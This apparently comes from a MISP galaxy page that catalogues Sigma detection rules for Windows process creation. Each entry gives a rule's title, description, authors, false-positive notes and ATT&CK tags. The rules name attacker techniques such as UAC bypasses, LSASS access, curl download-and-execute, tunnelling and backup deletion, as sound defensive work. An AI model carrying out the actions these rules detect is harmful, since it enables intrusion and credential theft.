creation_date 2021/12/27
falsepositive ['Unknown']
filename proc_creation_win_findstr_gpp_passwords.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Finger.exe Suspicious Invocation

Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays

Internal MISP references

UUID af491bca-e752-4b44-9c86-df5680533dbc which can be used as unique global reference for Finger.exe Suspicious Invocation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), omkar72, oscd.community
creation_date 2021/02/24
falsepositive ['Admin activity (unclear what they do nowadays with finger.exe)']
filename proc_creation_win_finger_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Suspicious Rundll32 Activity Invoking Sys File

Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452

Internal MISP references

UUID 731231b9-0b5d-4219-94dd-abb6959aa7ea which can be used as unique global reference for Suspicious Rundll32 Activity Invoking Sys File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/03/05
falsepositive ['Unknown']
filename proc_creation_win_rundll32_sys.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

HackTool - UACMe Akagi Execution

Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata

Internal MISP references

UUID d38d2fa4-98e6-4a24-aff1-410b0c9ad177 which can be used as unique global reference for HackTool - UACMe Akagi Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_hktl_uacme.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Arbitrary Command Execution Using Msdt.EXE

Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability

Internal MISP references

UUID 258fc8ce-8352-443a-9120-8a11e4857fa5 which can be used as unique global reference for Potential Arbitrary Command Execution Using Msdt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/29
falsepositive ['Unknown']
filename proc_creation_win_msdt_arbitrary_command_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Cloudflared Quick Tunnel Execution

Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.

Internal MISP references

UUID 222129f7-f4dc-4568-b0d2-22440a9639ba which can be used as unique global reference for Cloudflared Quick Tunnel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sajid Nawaz Khan
creation_date 2023/12/20
falsepositive ['Legitimate usage of Cloudflare Quick Tunnel']
filename proc_creation_win_cloudflared_quicktunnel_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.001']
Related clusters

To see the related clusters, click here.

Compressed File Extraction Via Tar.EXE

Detects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.

Internal MISP references

UUID bf361876-6620-407a-812f-bfe11e51e924 which can be used as unique global reference for Compressed File Extraction Via Tar.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AdmU3
creation_date 2023/12/19
falsepositive ['Likely']
filename proc_creation_win_tar_extraction.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.exfiltration', 'attack.t1560', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Sysmon Driver Unloaded Via Fltmc.EXE

Detects possible Sysmon filter driver unloaded via fltmc.exe

Internal MISP references

UUID 4d7cda18-1b12-4e52-b45c-d28653210df8 which can be used as unique global reference for Sysmon Driver Unloaded Via Fltmc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, oscd.community
creation_date 2019/10/23
falsepositive ['Unlikely']
filename proc_creation_win_fltmc_unload_driver_sysmon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1562', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Potential CommandLine Path Traversal Via Cmd.EXE

Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking

Internal MISP references

UUID 087790e3-3287-436c-bccf-cbd0184a7db1 which can be used as unique global reference for Potential CommandLine Path Traversal Via Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow @xknow_infosec, Tim Shelton
creation_date 2020/06/11
falsepositive ['Java tools are known to produce false-positive when loading libraries']
filename proc_creation_win_cmd_path_traversal.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Curl Download And Execute Combination

Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.

Internal MISP references

UUID 21dd6d38-2b18-4453-9404-a0fe4a0cc288 which can be used as unique global reference for Curl Download And Execute Combination in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/01/13
falsepositive ['Unknown']
filename proc_creation_win_cmd_curl_download_exec_combo.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Copy From Or To Admin Share Or Sysvol Folder

Detects a copy command or a copy utility execution to or from an Admin share or remote

Internal MISP references

UUID 855bc8b5-2ae8-402e-a9ed-b889e6df1900 which can be used as unique global reference for Copy From Or To Admin Share Or Sysvol Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
creation_date 2019/12/30
falsepositive ['Administrative scripts']
filename proc_creation_win_susp_copy_lateral_movement.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.collection', 'attack.exfiltration', 'attack.t1039', 'attack.t1048', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

UAC Bypass via ICMLuaUtil

Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface

Internal MISP references

UUID 49f2f17b-b4c8-4172-a68b-d5bf95d05130 which can be used as unique global reference for UAC Bypass via ICMLuaUtil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Elastic (idea)
creation_date 2022/09/13
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_icmluautil.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

HackTool - ADCSPwn Execution

Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service

Internal MISP references

UUID cd8c163e-a19b-402e-bdd5-419ff5859f12 which can be used as unique global reference for HackTool - ADCSPwn Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/31
falsepositive ['Unlikely']
filename proc_creation_win_hktl_adcspwn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

Sysprep on AppData Folder

Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)

Internal MISP references

UUID d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e which can be used as unique global reference for Sysprep on AppData Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/06/22
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_sysprep_appdata.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

HackTool - SharpEvtMute Execution

Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs

Internal MISP references

UUID bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c which can be used as unique global reference for HackTool - SharpEvtMute Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/07
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpevtmute.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

PowerShell Get-Process LSASS

Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity

Internal MISP references

UUID b2815d0d-7481-4bf0-9b6c-a4c48a94b349 which can be used as unique global reference for PowerShell Get-Process LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/04/23
falsepositive ['Unknown']
filename proc_creation_win_powershell_getprocess_lsass.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.004']
Related clusters

To see the related clusters, click here.

PUA - AdFind Suspicious Execution

Detects AdFind execution with common flags seen used during attacks

Internal MISP references

UUID 9a132afa-654e-11eb-ae93-0242ac130002 which can be used as unique global reference for PUA - AdFind Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
creation_date 2021/02/02
falsepositive ['Legitimate admin activity']
filename proc_creation_win_pua_adfind_susp_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1018', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.002', 'stp.1u']
Related clusters

To see the related clusters, click here.

HackTool - winPEAS Execution

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz

Internal MISP references

UUID 98b53e78-ebaf-46f8-be06-421aafd176d9 which can be used as unique global reference for HackTool - winPEAS Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Georg Lauenstein (sure[secure])
creation_date 2022/09/19
falsepositive ['Unlikely']
filename proc_creation_win_hktl_winpeas.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1082', 'attack.t1087', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Root Certificate Installed From Susp Locations

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Internal MISP references

UUID 5f6a601c-2ecb-498b-9c33-660362323afa which can be used as unique global reference for Root Certificate Installed From Susp Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Unlikely']
filename proc_creation_win_powershell_import_cert_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

Tasks Folder Evasion

The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr

Internal MISP references

UUID cc4e02ba-9c06-48e2-b09e-2500cace9ae0 which can be used as unique global reference for Tasks Folder Evasion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/01/13
falsepositive ['Unknown']
filename proc_creation_win_susp_task_folder_evasion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.execution', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Ping/Copy Command Combination

Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.

Internal MISP references

UUID ded2b07a-d12f-4284-9b76-653e37b6c8b0 which can be used as unique global reference for Potentially Suspicious Ping/Copy Command Combination in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/18
falsepositive ['Unknown']
filename proc_creation_win_cmd_ping_copy_combined_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Suspicious Modification Of Scheduled Tasks

Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on Instead they modify the task after creation to include their malicious payload

Internal MISP references

UUID 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b which can be used as unique global reference for Suspicious Modification Of Scheduled Tasks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/28
falsepositive ['Unknown']
filename proc_creation_win_schtasks_change.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

HackTool - PPID Spoofing SelectMyParent Tool Execution

Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent

Internal MISP references

UUID 52ff7941-8211-46f9-84f8-9903efb7077d which can be used as unique global reference for HackTool - PPID Spoofing SelectMyParent Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/23
falsepositive ['Unlikely']
filename proc_creation_win_hktl_selectmyparent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1134.004']
Related clusters

To see the related clusters, click here.

Firewall Disabled via Netsh.EXE

Detects netsh commands that turns off the Windows firewall

Internal MISP references

UUID 57c4bf16-227f-4394-8ec7-1b745ee061c3 which can be used as unique global reference for Firewall Disabled via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Fatih Sirin
creation_date 2019/11/01
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_fw_disable.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004', 'attack.s0108']
Related clusters

To see the related clusters, click here.

Uncommon Child Process Of BgInfo.EXE

Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

Internal MISP references

UUID aaf46cdc-934e-4284-b329-34aa701e3771 which can be used as unique global reference for Uncommon Child Process Of BgInfo.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
creation_date 2019/10/26
falsepositive ['Unknown']
filename proc_creation_win_bginfo_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Custom Class Execution via Xwizard

Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.

Internal MISP references

UUID 53d4bb30-3f36-4e8a-b078-69d36c4a79ff which can be used as unique global reference for Custom Class Execution via Xwizard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, @oscd_initiative
creation_date 2020/10/07
falsepositive ['Unknown']
filename proc_creation_win_lolbin_class_exec_xwizard.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Disable Important Scheduled Task

Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities

Internal MISP references

UUID 9ac94dc8-9042-493c-ba45-3b5e7c86b980 which can be used as unique global reference for Disable Important Scheduled Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/26
falsepositive ['Unknown']
filename proc_creation_win_schtasks_disable.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Directory Removal Via Rmdir

Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

Internal MISP references

UUID 41ca393d-538c-408a-ac27-cf1e038be80c which can be used as unique global reference for Directory Removal Via Rmdir in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/15
falsepositive ['Unknown']
filename proc_creation_win_cmd_rmdir_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Uncommon AddinUtil.EXE CommandLine Execution

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.

Internal MISP references

UUID 4f2cd9b6-4a17-440f-bb2a-687abb65993a which can be used as unique global reference for Uncommon AddinUtil.EXE CommandLine Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023/09/18
falsepositive ['Unknown']
filename proc_creation_win_addinutil_uncommon_cmdline.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential COM Objects Download Cradles Usage - Process Creation

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

Internal MISP references

UUID 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf which can be used as unique global reference for Potential COM Objects Download Cradles Usage - Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/25
falsepositive ['Legitimate use of the library']
filename proc_creation_win_powershell_download_com_cradles.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Add Windows Capability Via PowerShell Cmdlet

Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.

Internal MISP references

UUID b36d01a3-ddaf-4804-be18-18a6247adfcd which can be used as unique global reference for Add Windows Capability Via PowerShell Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/22
falsepositive ['Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.']
filename proc_creation_win_powershell_add_windows_capability.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Scripting/CommandLine Process Spawned Regsvr32

Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.

Internal MISP references

UUID ab37a6ec-6068-432b-a64e-2c7bf95b1d22 which can be used as unique global reference for Scripting/CommandLine Process Spawned Regsvr32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/26
falsepositive ['Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary', 'Some legitimate Windows services']
filename proc_creation_win_regsvr32_susp_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

DLL Execution Via Register-cimprovider.exe

Detects using register-cimprovider.exe to execute arbitrary dll file.

Internal MISP references

UUID a2910908-e86f-4687-aeba-76a5f996e652 which can be used as unique global reference for DLL Execution Via Register-cimprovider.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ivan Dyachkov, Yulia Fomina, oscd.community
creation_date 2020/10/07
falsepositive ['Unknown']
filename proc_creation_win_registry_cimprovider_dll_load.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574']
Related clusters

To see the related clusters, click here.

Uncommon Userinit Child Process

Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.

Internal MISP references

UUID 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 which can be used as unique global reference for Uncommon Userinit Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure), Tim Shelton
creation_date 2019/01/12
falsepositive ['Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.']
filename proc_creation_win_userinit_uncommon_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1037.001', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Start of NT Virtual DOS Machine

Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications

Internal MISP references

UUID 16905e21-66ee-42fe-b256-1318ada2d770 which can be used as unique global reference for Start of NT Virtual DOS Machine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/16
falsepositive ['Legitimate use']
filename proc_creation_win_susp_16bit_application.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

SystemStateBackup Deleted Using Wbadmin.EXE

Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.

Internal MISP references

UUID 89f75308-5b1b-4390-b2d8-d6b2340efaf8 which can be used as unique global reference for SystemStateBackup Deleted Using Wbadmin.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/13
falsepositive ['Unknown']
filename proc_creation_win_wbadmin_delete_systemstatebackup.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

File Download Using ProtocolHandler.exe

Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)

Internal MISP references

UUID 104cdb48-a7a8-4ca7-a453-32942c6e5dcb which can be used as unique global reference for File Download Using ProtocolHandler.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/13
falsepositive ['Unknown']
filename proc_creation_win_protocolhandler_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Uncommon One Time Only Scheduled Task At 00:00

Detects scheduled task creation events that include suspicious actions, and is run once at 00:00

Internal MISP references

UUID 970823b7-273b-460a-8afc-3a6811998529 which can be used as unique global reference for Uncommon One Time Only Scheduled Task At 00:00 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/07/15
falsepositive ['Software installation']
filename proc_creation_win_schtasks_one_time_only_midnight_task.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Copying Sensitive Files with Credential Data

Files with well-known filenames (sensitive files with credential data) copying

Internal MISP references

UUID e7be6119-fc37-43f0-ad4f-1f3f99be2f9f which can be used as unique global reference for Copying Sensitive Files with Credential Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/22
falsepositive ['Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator']
filename proc_creation_win_esentutl_sensitive_file_copy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.003', 'car.2013-07-001', 'attack.s0404']
Related clusters

To see the related clusters, click here.

Suspicious Driver Install by pnputil.exe

Detects when a possible suspicious driver is being installed via pnputil.exe lolbin

Internal MISP references

UUID a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 which can be used as unique global reference for Suspicious Driver Install by pnputil.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger
creation_date 2021/09/30
falsepositive ['Pnputil.exe being used may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

Use of UltraVNC Remote Access Software

An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks

Internal MISP references

UUID 145322e4-0fd3-486b-81ca-9addc75736d8 which can be used as unique global reference for Use of UltraVNC Remote Access Software in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/02
falsepositive ['Legitimate use']
filename proc_creation_win_ultravnc.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Indirect Inline Command Execution Via Bash.EXE

Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.

Internal MISP references

UUID 5edc2273-c26f-406c-83f3-f4d948e740dd which can be used as unique global reference for Indirect Inline Command Execution Via Bash.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/24
falsepositive ['Unknown']
filename proc_creation_win_bash_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Operator Bloopers Cobalt Strike Modules

Detects Cobalt Strike module/commands accidentally entered in CMD shell

Internal MISP references

UUID 4f154fb6-27d1-4813-a759-78b93e0b9c48 which can be used as unique global reference for Operator Bloopers Cobalt Strike Modules in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author _pete_0, TheDFIRReport
creation_date 2022/05/06
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Service Started/Stopped Via Wmic.EXE

Detects usage of wmic to start or stop a service

Internal MISP references

UUID 0b7163dc-7eee-4960-af17-c0cd517f92da which can be used as unique global reference for Service Started/Stopped Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Unknown']
filename proc_creation_win_wmic_service_manipulation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Odbcconf.EXE Suspicious DLL Location

Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.

Internal MISP references

UUID 6b65c28e-11f3-46cb-902a-68f2cafaf474 which can be used as unique global reference for Odbcconf.EXE Suspicious DLL Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['Unlikely']
filename proc_creation_win_odbcconf_exec_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Windows App Activity

Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution

Internal MISP references

UUID f91ed517-a6ba-471d-9910-b3b4a398c0f3 which can be used as unique global reference for Potentially Suspicious Windows App Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/12
falsepositive ['Legitimate packages that make use of external binaries such as Windows Terminal']
filename proc_creation_win_susp_appx_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Mshtml.DLL RunHTMLApplication Suspicious Usage

Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)

Internal MISP references

UUID 4782eb5a-a513-4523-a0ac-f3082b26ac5c which can be used as unique global reference for Mshtml.DLL RunHTMLApplication Suspicious Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
creation_date 2022/08/14
falsepositive ['Unlikely']
filename proc_creation_win_rundll32_mshtml_runhtmlapplication.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI

